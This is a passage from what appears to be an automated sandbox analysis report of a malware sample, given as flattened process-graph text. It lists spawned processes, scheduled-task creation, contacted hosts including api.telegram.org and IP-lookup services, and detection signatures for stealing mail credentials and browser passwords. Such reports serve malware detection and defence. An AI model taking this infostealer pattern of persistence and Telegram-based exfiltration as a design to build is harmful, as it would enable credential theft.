8->23         started        29 2 other processes 8->29 87 Antivirus detection for dropped file 12->87 89 Multi AV Scanner detection for dropped file 12->89 25 wiSeRRwvZHTk.exe 12->25         started        27 schtasks.exe 12->27         started        61 127.0.0.1 unknown unknown 14->61 file6 signatures7 process8 dnsIp9 63 Loading BitLocker PowerShell Module 17->63 31 conhost.exe 17->31         started        33 WmiPrvSE.exe 17->33         started        55 api.telegram.org 149.154.167.220, 443, 49718, 49721 TELEGRAMRU United Kingdom 20->55 57 checkip.dyndns.com 193.122.130.0, 49682, 49685, 49686 ORACLE-BMC-31898US United States 20->57 59 reallyfreegeoip.org 104.21.32.1, 443, 49683, 49684 CLOUDFLARENETUS United States 20->59 35 conhost.exe 23->35         started        65 Tries to steal Mail credentials (via file / registry access) 25->65 67 Tries to harvest and steal browser information (history, passwords, etc) 25->67 37 conhost.exe 27->37         started        39 conhost.exe 29->39         started        signatures10 process11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.